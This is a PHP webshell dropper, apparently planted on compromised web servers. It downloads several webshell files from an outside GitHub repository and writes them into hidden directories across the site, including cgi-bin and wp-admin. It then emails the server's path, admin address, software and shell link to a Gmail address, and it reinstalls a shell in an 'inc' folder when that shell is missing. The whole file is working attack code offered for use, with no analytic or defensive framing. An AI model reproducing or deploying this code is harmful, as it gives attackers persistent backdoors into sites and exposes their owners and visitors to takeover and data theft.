

<?php
function http_get($url){
	$im = curl_init($url);
	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($im, CURLOPT_HEADER, 0);
	return curl_exec($im);
	curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/.js/index.php" ;
$text = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/master/zz.php');
                    $open = fopen($check, 'w');
                    fwrite($open, $text);
                    fclose($open);
                    if (file_exists($check)) {
                        echo $check . "</br>";
                    } else echo "not exits";
                    echo "done .
 ";
                    $check = $_SERVER['DOCUMENT_ROOT'] . "/.modules/index.php";
                    $text = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/master/templates.php');
                    $open = fopen($check, 'w');
                    fwrite($open, $text);
                    fclose($open);
                    if (file_exists($check)) {
                        echo $check . "</br>";
                    } else echo "not exits";
                    echo "done .
 ";
                    $check = $_SERVER['DOCUMENT_ROOT'] . "/.includes/index.php";
                    $text = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/master/Mydb.php');
                    $open = fopen($check, 'w');
                    fwrite($open, $text);
                    fclose($open);
                    if (file_exists($check)) {
                        echo $check . "</br>";
                    } else echo "not exits";
                    echo "done .
 ";
                    $check = $_SERVER['DOCUMENT_ROOT'] . "/.sites/index.php";
                    $text = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/master/uploadhacking.php');
                    $open = fopen($check, 'w');
                    fwrite($open, $text);
                    fclose($open);
                    if (file_exists($check)) {
                        echo $check . "</br>";
                    } else echo "not exits";
                    echo "done .
 ";
                    $check2 = $_SERVER['DOCUMENT_ROOT'] . "/.css/index.php";
                    $text2 = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php');
                    $open2 = fopen($check2, 'w');
                    fwrite($open2, $text2);
                    fclose($open2);
                    if (file_exists($check2)) {
                        echo $check2 . "</br>";
                    } else echo "not exits2";
                    echo "done2 .
 ";
                    $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/index.php";
                    $text = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/master/bypas1.php');
                    $open = fopen($check, 'w');
                    fwrite($open, $text);
                    fclose($open);
                    if (file_exists($check)) {
                        echo $check . "</br>";
                    } else echo "not exits";
                    echo "done .
 ";
                    $check3 = $_SERVER['DOCUMENT_ROOT'] . "/.index.php";
                    $text3 = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/main/up.php%5C');
                    $op3 = fopen($check3, 'w');
                    fwrite($op3, $text3);
                    fclose($op3);
                    $check6 = $_SERVER['DOCUMENT_ROOT'] . "/images/index.php";
                    $text6 = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/main/up.php%5C');
                    $op6 = fopen($check6, 'w');
                    fwrite($op6, $text6);
                    fclose($op6);
                    $check6 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/.index.php";
                    $text6 = http_get('https://raw.githubusercontent.com/exploit-haxor/webshell/main/usa.txt');
                    $op6 = fopen($check6, 'w');
                    fwrite($op6, $text6);
                    fclose($op6);
?><?php $kime = "malaysia.sender@gmail.com";
                    $baslik = "r00t Server Avcisi V1.0";
                    $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "
";
                    $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "
";
                    $EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "
";
                    $EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "
";
                    $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "
";
                    mail($kime, $baslik, $EL_MuHaMMeD);
?>
 
<?php
                    if ($_POST['query']) {
                        $veriyfy = stripslashes(stripslashes($_POST['query']));
                        $data = "data.txt";
                        @touch("data.txt");
                        $ver = @fopen($data, 'w');
                        @fwrite($ver, $veriyfy);
                        @fclose($ver);
                    } else {
                        $datas = @fopen("data.txt", 'r');
                        $i = 0;
                        while ($i <= 5) {
                            $i++;
                            $blue = @fgets($datas, 1024);
                            echo $blue;
                        }
                    }
                    $datasi = @fopen("inc/index.php", 'r');
                    if ($datasi) {
                    } else {
                        @mkdir("inc");
                        $dos = file_get_contents("https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php");
                        $data = "inc/index.php";
                        @touch("inc/index.php");
                        $ver = @fopen($data, 'w');
                        @fwrite($ver, $dos);
                        @fclose($ver);
                        $yol = "http://" . $_SERVER['HTTP_HOST'] . "" . $_SERVER['REQUEST_URI'] . "";
                        $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : ' . $yol . '<br/>Sender Yolu : inc/index.php</h1>';
                        $header.= "From: SheLL Boot <suppor@nic.org>
";
                        $header.= "Content-Type: text/html; charset=utf-8
";
                        @mail("malaysia.sender@gmail.com", "Hacklink Bildiri", "$y", $header);
                        @mail("malaysia.sender@gmail.com", "Hacklink Bildiri", "$y", $header);
                    }
?>
